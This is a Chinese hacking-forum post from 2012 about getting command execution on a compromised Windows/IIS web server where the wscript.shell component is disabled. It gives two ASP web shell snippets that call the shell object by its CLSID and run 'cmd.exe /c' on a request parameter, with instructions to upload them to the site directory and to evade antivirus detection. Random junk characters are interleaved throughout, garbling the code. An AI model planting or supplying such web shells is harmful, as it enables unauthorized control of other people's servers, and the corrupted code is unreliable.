中国网络渗透测试联盟

标题: 没有wscript.shell组件提权方法 [打印本页]

作者: admin 时间: 2012-10-21 09:08
标题: 没有wscript.shell组件提权方法

可能有很多人，看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
! T# q z ?, O6 d6 @
一般当闭上面组件时，你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。6 O" j9 r! [/ v6 p7 r& F. J F
要想让运行命令可以试试这种方法，成功率为五五之数。# W; O- s! B' }5 D& T
把下面代码复制：6 ~: G/ E8 _! f/ k& I0 }. @: A
<%0 N4 {8 T0 I6 s$ m+ v& e
end if
6 g' z& b7 u& n; ?( S& k
response.write(”")4 f) B& Q0 r' {& c8 ?" W
On Error Resume ( q4 d4 b3 d3 Z4 }8 t" A
Next
) L) L M& q6 v& I
response.write oScriptlhn.exec(”cmd.exe /c” &
$ F4 Z) _( ?6 v( A
request(”c”)).stdout.readall
- P) N; s6 d& g$ p5 F) V
response.write(”")4 ~# X5 j5 e; O$ x" V$ ?: j* y6 o6 L
response.write(”")' t! ]- X6 ~' Y" @: V- C" z
response.write(”8 n: N U2 u8 \3 z$ A. F
“)
% W5 p9 b3 L9 T4 c9 E: E' Q
response.write(”")! p- i% m7 b: R2 z0 M& e7 q' n3 u
%>2 \1 E9 i, Z3 N5 D. R! p6 s
保存为一个asp文件，然后传到网站目录上去
3 l/ n% S5 ^6 n$ j" Y3 f
运行的时候可能会出现两个问题，第一是运行了为什么运行不了命令，这个你可以试着再上传个cmd.exe然后把路径写入上面代码。! O# Y: { |0 ?
我用此成功运行过cacls命令。
6 Z# p7 p1 s; e$ P% ?- X
第二那就是运行时出错，可能限制某些代码执行
' d& U+ Y) }- Y+ p! s( f+ @5 P
无wscript.shell组件提权又一个方法2 x( p8 \+ F8 ? n% @- u6 @5 s# E
<object runat=server id=oScriptlhn scope=page
4 @" l3 E4 c" j, L6 h9 d
! f/ Y' U0 w* `( O% ?
classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
# J9 d" L, V4 ?- G3 p# P
<%if err then%>
3 x+ V$ ~1 k- H- ^9 q0 a' _6 [; k" X. L
<object runat=server id=oScriptlhn scope=page
( W: z* c0 N/ k# {" ~
+ _: P/ o9 _* ]) y3 |( O
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
, n" O$ I7 e# B: E1 y* l) L
<% & X" y' E8 a! S' n, @
end if
9 R2 _0 B4 Q; n \9 W& f0 y
response.write(”<textarea readonly cols=80 * w% [' w% x+ F3 j1 ^
/ w9 c6 q+ Q7 E4 b
rows=20>”)
# g. A7 q) _" c! S) E2 U
On Error Resume Next
: A7 {( O7 O$ |* R! d" F
response.write & r9 V d1 T0 N; i6 v1 J3 Z
0 n8 J0 o z7 M% Y3 l
oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall. v6 e3 Y8 B: H N
response.write(”</textarea>”) # }7 P# i: \" A* W4 t6 T
response.write(”<form
' K3 `3 Y( F" j3 f
1 Q& |4 W0 Y3 j) i5 D; h1 n
method=’post’>”)
* ?/ ~, B. W6 s" E
response.write(”<input type=text name=’c' ) N1 E( D5 l m8 O& }
0 h2 K; o* E$ p2 W$ f7 z" D# m8 L8 V5 H
size=60><br>”)
1 V \. _9 a; @8 Z( M8 E$ m2 c
response.write(”<input type=submit / i1 e0 w" T( g% {, A. v/ ?- ^
" P6 g* ^. Q$ b* w8 V5 i
value=’执行’></form>”) 2 B2 S( ^9 a4 o3 r! }0 V$ F
%>
f! ?7 } M$ G
保存为ASP，此代码可能被杀，请注意免杀。1 B8 x) ` t/ e% c2 b5 |7 Y
原理：有些人把wscript.shell改名了,但是clsid没有变，所以调用这个clsid就等于调用ws组建" N* a5 X' X' _0 A. s, E

复制代码

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)